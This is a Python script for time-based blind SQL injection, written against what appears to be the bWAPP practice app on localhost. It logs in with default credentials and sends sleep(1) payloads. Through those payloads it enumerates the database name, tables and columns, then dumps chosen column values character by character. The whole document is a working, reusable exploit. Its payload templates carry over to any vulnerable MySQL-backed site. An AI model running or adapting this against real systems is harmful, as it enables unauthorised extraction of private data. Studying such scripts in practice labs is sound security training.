SQL盲注脚本

#coding:utf-8
import requests
import time

# Target host:port of the lab application; loopback only.
ip_port = "127.0.0.1:80"
# Form fields posted to login.php to obtain an authenticated session.
data = dict(
    login="bee",
    password="bug",
    security_level="0",
    form="submit",
)
urlLogin = "http://{}/login.php".format(ip_port)
# One Session object so the login cookie is reused by every later request.
session = requests.Session()
# NOTE: this POST runs at import time, not under a __main__ guard.
resp = session.post(urlLogin, data)
num = 0  # not referenced anywhere below; kept so the module namespace is unchanged

#获取数据库名长度
def get_length_of_database():
    """Return the database-name length reported by the time-based oracle.

    Candidate lengths are tried from 1 upwards; the first request whose
    round-trip exceeds one second is taken as the true length. Any request
    slower than one second for another reason (latency, server load) is
    indistinguishable from a hit, and the loop has no upper bound.

    Returns:
        int: the first candidate length that produced a delayed response.
    """
    template = "http://%s/sqli_15.php?title=World War Z' and length(database())=%d and sleep(1) -- &action=search"
    candidate = 1
    while True:
        started = time.time()
        session.get(template % (ip_port, candidate))
        if time.time() - started > 1:
            return candidate
        candidate += 1

#获取数据库名字
def get_name_of_database():
    """Recover the database name one character at a time.

    For every position the ASCII codes 33..127 are tried in order and the
    first whose request exceeds one second is accepted as that character.
    Positions run over ``range(1, length)``, i.e. 1 .. length-1, where
    ``length`` comes from ``get_length_of_database``.

    Returns:
        str: the recovered characters joined in position order; a position
        with no delayed response contributes nothing.
    """
    length_of_database = get_length_of_database()
    template = "http://%s/sqli_15.php?title=World War Z' and ascii(substr(database(),%d,1))=%d and sleep(1) -- &action=search"
    recovered = []
    for position in range(1, length_of_database):
        for code in range(33, 128):
            started = time.time()
            session.get(template % (ip_port, position, code))
            if time.time() - started > 1:
                recovered.append(chr(code))
                break
    return "".join(recovered)

#获取指定库中表的数量
def get_count_of_tables():
    """Return the number of tables in the current database per the oracle.

    Counts from 1 upwards are tried until one request takes longer than a
    second. There is no upper bound, so a target that never delays keeps
    this loop running indefinitely.

    Returns:
        int: the first candidate count that produced a delayed response.
    """
    template = "http://%s/sqli_15.php?title=World War Z' and (select count(*) from information_schema.tables where table_schema=database())=%d and sleep(1) -- &action=search"
    candidate = 1
    while True:
        started = time.time()
        session.get(template % (ip_port, candidate))
        if time.time() - started > 1:
            return candidate
        candidate += 1

#获取指定库所有表的表名长度的列表
def get_length_list_of_tables():
    """Return the name length of every table, indexed by table position.

    ``get_count_of_tables`` decides how many positions to probe; for each
    position candidate lengths start at 1 and grow until a request exceeds
    one second. Each inner loop is unbounded.

    Returns:
        list[int]: one length per table, in ``limit`` offset order.
    """
    template = "http://%s/sqli_15.php?title=World War Z' and  (select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d and sleep(1) -- &action=search"
    lengths = []
    for offset in range(get_count_of_tables()):
        candidate = 1
        while True:
            started = time.time()
            session.get(template % (ip_port, offset, candidate))
            if time.time() - started > 1:
                lengths.append(candidate)
                break
            candidate += 1
    return lengths

#获取指定库中的所有表名列表
def get_tables():
    """Return the names of all tables in the current database.

    The table count is probed here and again inside
    ``get_length_list_of_tables``, so the count oracle runs twice. Each
    character is found by trying ASCII codes 33..127 until a request
    exceeds one second; a position with no delayed response is skipped.

    Returns:
        list[str]: one name per table, in ``limit`` offset order.
    """
    count_of_tables = get_count_of_tables()
    length_list = get_length_list_of_tables()
    template = "http://%s/sqli_15.php?title=World War Z' and  (select ascii(substr((table_name),%d,1)) from information_schema.tables where table_schema=database() limit %d,1)=%d and sleep(1) -- &action=search"
    names = []
    for offset in range(count_of_tables):
        chars = []
        # substr() positions are 1-based, hence position + 1.
        for position in range(length_list[offset]):
            for code in range(33, 128):
                started = time.time()
                session.get(template % (ip_port, position + 1, offset, code))
                if time.time() - started > 1:
                    chars.append(chr(code))
                    break
        names.append("".join(chars))
    return names

#获取指定表中列的数量
def get_count_of_columns(name_of_table):
    """Return the number of columns in ``name_of_table`` per the oracle.

    Args:
        name_of_table: table name inserted verbatim (unescaped) into the
            query text inside double quotes.

    Returns:
        int: the first candidate count whose request exceeded one second.
        The loop has no upper bound.
    """
    template = "http://%s/sqli_15.php?title=World War Z' and (select count(*) from information_schema.columns where table_schema=database() and table_name=\"%s\")=%d and sleep(1) -- &action=search"
    candidate = 1
    while True:
        started = time.time()
        session.get(template % (ip_port, name_of_table, candidate))
        if time.time() - started > 1:
            return candidate
        candidate += 1

#获取指定表所有列的列名长度
def get_length_list_of_columns(name_of_table):
    """Return the name length of every column of ``name_of_table``.

    Args:
        name_of_table: table name inserted verbatim (unescaped) into the
            query text.

    Returns:
        list[int]: one length per column, in ``limit`` offset order; each
        inner probe loop is unbounded.
    """
    template = "http://%s/sqli_15.php?title=World War Z' and (select length(column_name) from information_schema.columns where table_schema=database() and table_name=\"%s\" limit %d,1)=%d and sleep(1) -- &action=search"
    lengths = []
    for offset in range(get_count_of_columns(name_of_table)):
        candidate = 1
        while True:
            started = time.time()
            session.get(template % (ip_port, name_of_table, offset, candidate))
            if time.time() - started > 1:
                lengths.append(candidate)
                break
            candidate += 1
    return lengths

#获取指定表的所有列的列名
def get_columns(name_of_table):
    """Return the column names of ``name_of_table``.

    The column count is probed here and again inside
    ``get_length_list_of_columns``. Characters are recovered by trying ASCII
    codes 33..127 per position until a request exceeds one second.

    Args:
        name_of_table: table name inserted verbatim (unescaped) into the
            query text.

    Returns:
        list[str]: one name per column, in ``limit`` offset order.
    """
    count_of_columns = get_count_of_columns(name_of_table)
    length_list = get_length_list_of_columns(name_of_table)
    template = "http://%s/sqli_15.php?title=World War Z' and  (select ascii(substr((column_name),%d,1)) from information_schema.columns where table_schema=database() and table_name=\"%s\" limit %d,1)=%d and sleep(1) -- &action=search"
    names = []
    for offset in range(count_of_columns):
        chars = []
        # substr() positions are 1-based, hence position + 1.
        for position in range(length_list[offset]):
            for code in range(33, 128):
                started = time.time()
                session.get(template % (ip_port, position + 1, name_of_table, offset, code))
                if time.time() - started > 1:
                    chars.append(chr(code))
                    break
        names.append("".join(chars))
    return names

#获取指定表指定列名数据个数
def get_count_of_datas(name_of_table, name_of_column):
    """Return ``count(column)`` of ``name_of_table`` per the oracle.

    Args:
        name_of_table: table name inserted verbatim (unescaped) into the
            query text.
        name_of_column: column name inserted verbatim (unescaped).

    Returns:
        int: the first candidate count whose request exceeded one second.
        The loop has no upper bound.
    """
    template = "http://%s/sqli_15.php?title=World War Z' and (select count(%s) from %s)=%d and sleep(1) -- &action=search"
    candidate = 1
    while True:
        started = time.time()
        session.get(template % (ip_port, name_of_column, name_of_table, candidate))
        if time.time() - started > 1:
            return candidate
        candidate += 1

#获取指定表指定列名数据长度列表
def get_length_list_of_datas(name_of_table, name_of_column):
    """Return the string length of every value in one column.

    Args:
        name_of_table: table name inserted verbatim (unescaped) into the
            query text.
        name_of_column: column name inserted verbatim (unescaped).

    Returns:
        list[int]: one length per row, in ``limit`` offset order; each
        inner probe loop is unbounded.
    """
    template = "http://%s/sqli_15.php?title=World War Z' and (select length(%s) from %s limit %d,1)=%d and sleep(1) -- &action=search"
    lengths = []
    for offset in range(get_count_of_datas(name_of_table, name_of_column)):
        candidate = 1
        while True:
            started = time.time()
            session.get(template % (ip_port, name_of_column, name_of_table, offset, candidate))
            if time.time() - started > 1:
                lengths.append(candidate)
                break
            candidate += 1
    return lengths

#爆破数据
def get_datas(name_of_table, name_of_column):
    """Return every value of one column as a list of strings.

    The row count is probed here and again inside
    ``get_length_list_of_datas``. Characters are recovered by trying ASCII
    codes 33..127 per position until a request exceeds one second; a
    position with no delayed response is skipped.

    Args:
        name_of_table: table name inserted verbatim (unescaped) into the
            query text.
        name_of_column: column name inserted verbatim (unescaped).

    Returns:
        list[str]: one recovered string per row, in ``limit`` offset order.
    """
    count_of_datas = get_count_of_datas(name_of_table, name_of_column)
    length_list = get_length_list_of_datas(name_of_table, name_of_column)
    template = "http://%s/sqli_15.php?title=World War Z' and (select ascii(substr((%s),%d,1)) from %s limit %d,1)=%d and sleep(1) -- &action=search"
    rows = []
    for offset in range(count_of_datas):
        chars = []
        # substr() positions are 1-based, hence position + 1.
        for position in range(length_list[offset]):
            for code in range(33, 128):
                started = time.time()
                session.get(template % (ip_port, name_of_column, position + 1, name_of_table, offset, code))
                if time.time() - started > 1:
                    chars.append(chr(code))
                    break
        rows.append("".join(chars))
    return rows

def main():
    """Interactive driver: list tables, pick one, list its columns, dump one.

    Selections are read from stdin and must match an enumerated name
    exactly; otherwise "Error!" is printed and the process exits. The
    chosen names are passed through to the query builders unescaped.
    """

    def report(items):
        # Print each discovered name on its own "[+]" line.
        for item in items:
            print("[+]%s" % (item,))

    print("Judging the database...")
    print()
    print("Getting the table name...")
    tables = get_tables()
    report(tables)
    print("The table names in this database are:%s" % (tables,))
    table = input("Select the Table name:")
    if table not in tables:
        print("Error!")
        exit()

    print()
    print("Getting the column names in the %s table......" % (table,))
    columns = get_columns(table)
    report(columns)
    print("The column name in %s are:%s" % (table, columns))
    column = input("Select the Column name:")
    if column not in columns:
        print("Error!")
        exit()

    print()
    print("Getting the datas......")
    report(get_datas(table, column))

if __name__=='__main__':
    # Run the interactive driver only when executed as a script
    # (the login POST above still runs on plain import).
    main()
